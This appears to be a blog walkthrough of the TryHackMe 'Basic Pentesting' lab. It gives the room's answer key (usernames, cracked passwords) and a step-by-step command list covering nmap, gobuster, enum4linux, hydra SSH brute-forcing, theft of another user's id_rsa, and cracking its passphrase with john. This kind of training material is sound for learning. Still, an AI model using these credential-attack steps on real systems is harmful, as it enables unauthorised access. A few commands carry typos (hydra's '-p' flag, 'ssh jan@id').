Basic Pentesting – TryHackMe

 

 1. What is the name of the hidden directory on the web server(enter name without /)?

Ans: development

2. What is the username? 

Ans: jan

3. What is the password? 

Ans:  armando

4. What service do you use to access the server(answer in abbreviation in all caps)?

Ans: ssh 

5. What is the name of the other user you found(all lower case)? 

Ans: kay

 6. What is the final password you obtain?

 Ans: heresareallystrongpasswordthatfollowsthepasswordpolicy$$

===========================

1st Start – Machine Run and openvpn Run
Command (in dir): sudo openvpn file.ovpn
2nd → Run ip address with in browser go to view source code
3rd → use cmd to run
Command: nmap -sC -sV -oN initial IP Address
For find out open port scanning like “22,80,145”
4th → Command: gobuster dir --url http://Ip --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
5th → copy ip/dir to open with browser
6th → cmd: enum4linux -a ip address for find out user name
7th → cmd: hydra -l jan -p /usr/share/wordlists/rockyou.txt ssh://ip

Get Password  jan@armando
8th → cmd: ssh jan@ip then put password
9th → cmd: pwd
cmd: cd /
cmd: ls
cmd: cd home
cmd: ls
cmd: cd kay
cmd: ls
cmd: ls -al
cmd: cd .ssh
cmd: ls
cmd: ls -al
cmd: cat id_rsa
10th →cmd: nano id_rsa
cmd: ssh2john id_rsa > hash_key.txt 

cmd: john hash_key.txt --wordlist=/usr/share/wordlists/rockyou.txt

Key: beeswax

cmd: ssh jan@id
cmd: ssh -i /home/kay/.ssh/id_rsa kay@id
input key
cmd: ls -al

cmd: cat pass.bak


Comments

Popular posts from this blog

Pickle Rick - TryHackMe Problem Solving

Startup - TryHackMe Problem Solving

Tomghost - TryHackMe Problem Solving